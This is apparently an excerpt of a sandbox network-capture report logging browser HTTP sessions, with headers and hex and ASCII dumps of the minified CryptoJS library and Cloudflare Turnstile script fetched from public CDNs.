                                                                          2024-10-29 15:50:49 UTC1369INData Raw: 74 69 6f 6e 20 67 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63
                                                                          Data Ascii: tion g(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}func
                                                                          2024-10-29 15:50:49 UTC1369INData Raw: 6f 70 3d 22 30 22 2c 70 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 70 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 70 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 70 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 70 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 66 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 66 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 66 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 66 2e 73 74 79 6c
                                                                          Data Ascii: op="0",p.style.left="0",p.style.transformOrigin="center center",p.style.overflowX="hidden",p.style.overflowY="auto",p.style.background="rgba(0,0,0,0.4)";var f=document.createElement("div");f.style.display="table-cell",f.style.verticalAlign="middle",f.styl


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.1649712104.17.25.144436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:49 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                          Host: cdnjs.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:49 UTC958INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Oct 2024 15:50:49 GMT
                                                                          Content-Type: application/javascript; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Access-Control-Allow-Origin: *
                                                                          Cache-Control: public, max-age=30672000
                                                                          ETag: W/"5eb03e2d-bb78"
                                                                          Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                          cf-cdnjs-via: cfworker/kv
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Timing-Allow-Origin: *
                                                                          X-Content-Type-Options: nosniff
                                                                          CF-Cache-Status: HIT
                                                                          Age: 427539
                                                                          Expires: Sun, 19 Oct 2025 15:50:49 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QwKSHfRF%2BChEGLbq%2FKsBXWtaSyffuCqE4hL3IN%2BfrA0fsGGU9oRDYqNzRHlcF4DLiKvmgciiiVVl3Y6iikcvhaf9urFcT4OhEyldVQ4Lk3GewIfhj75uxqQ3SEF6lWuDxsNyrO49"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                          Strict-Transport-Security: max-age=15780000
                                                                          Server: cloudflare
                                                                          CF-RAY: 8da452d06fbf2cb4-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-10-29 15:50:49 UTC411INData Raw: 37 62 66 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                          Data Ascii: 7bf3!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                          2024-10-29 15:50:49 UTC1369INData Raw: 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20
                                                                          Data Ascii: window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof
                                                                          2024-10-29 15:50:49 UTC1369INData Raw: 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69
                                                                          Data Ascii: ;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:functi
                                                                          2024-10-29 15:50:49 UTC1369INData Raw: 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73
                                                                          Data Ascii: )),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProces
                                                                          2024-10-29 15:50:49 UTC1369INData Raw: 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31
                                                                          Data Ascii: =i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1
                                                                          2024-10-29 15:50:49 UTC1369INData Raw: 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b
                                                                          Data Ascii: [4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+
                                                                          2024-10-29 15:50:49 UTC1369INData Raw: 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32
                                                                          Data Ascii: %4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=42949672
                                                                          2024-10-29 15:50:49 UTC1369INData Raw: 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d
                                                                          Data Ascii: S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m
                                                                          2024-10-29 15:50:49 UTC1369INData Raw: 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f
                                                                          Data Ascii: e.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o
                                                                          2024-10-29 15:50:49 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29
                                                                          Data Ascii: nction(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5)))


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.1649713184.28.90.27443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:50 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          Accept-Encoding: identity
                                                                          User-Agent: Microsoft BITS/7.8
                                                                          Host: fs.microsoft.com
                                                                          2024-10-29 15:50:50 UTC466INHTTP/1.1 200 OK
                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                          Content-Type: application/octet-stream
                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                          Server: ECAcc (lpl/EF06)
                                                                          X-CID: 11
                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                          X-Ms-Region: prod-weu-z1
                                                                          Cache-Control: public, max-age=75838
                                                                          Date: Tue, 29 Oct 2024 15:50:50 GMT
                                                                          Connection: close
                                                                          X-CID: 2


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.1649714104.18.95.414436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:50 UTC383OUTGET /turnstile/v0/g/f2bbd6738e15/api.js HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:50 UTC471INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Oct 2024 15:50:50 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 47532
                                                                          Connection: close
                                                                          accept-ranges: bytes
                                                                          last-modified: Fri, 18 Oct 2024 17:38:58 GMT
                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                          access-control-allow-origin: *
                                                                          cross-origin-resource-policy: cross-origin
                                                                          Server: cloudflare
                                                                          CF-RAY: 8da452d5ca8de5a9-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 68 29 7b 74 72 79 7b 76 61 72 20 70 3d 65 5b 6c 5d 28 68 29 2c 66 3d 70 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 6e 28 73 29 3b 72 65 74 75 72 6e 7d 70 2e 64 6f 6e 65 3f 72 28 66 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 66 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                          Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var p=e[l](h),f=p.value}catch(s){n(s);return}p.done?r(f):Promise.resolve(f).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 6c 3d 21 31 2c 68 2c 70 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 68 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 68 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                                                          Data Ascii: t(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,l=!1,h,p;try{for(n=n.call(e);!(c=(h=n.next()).done)&&(o.push(h.value),!(r&&o.length===r));c=!0)
                                                                          2024-10-29 15:50:50 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 28 73 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 68 26 26 28 68 3d 30 2c 73 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 6c 3d 73 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 73 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 6c 3d 63 2e 72 65 74 75 72 6e 29 26 26 6c 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 6c 3d 6c 2e 63 61 6c 6c 28 63 2c 73 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 6c 3b 73 77 69 74 63 68 28 63 3d 30 2c 6c 26 26 28 73 3d 5b 73 5b 30 5d 26 32 2c 6c 2e 76 61 6c
                                                                          Data Ascii: ])}}function f(s){if(o)throw new TypeError("Generator is already executing.");for(;h&&(h=0,s[0]&&(n=0)),n;)try{if(o=1,c&&(l=s[0]&2?c.return:s[0]?c.throw||((l=c.return)&&l.call(c),0):c.next)&&!(l=l.call(c,s[1])).done)return l;switch(c=0,l&&(s=[s[0]&2,l.val
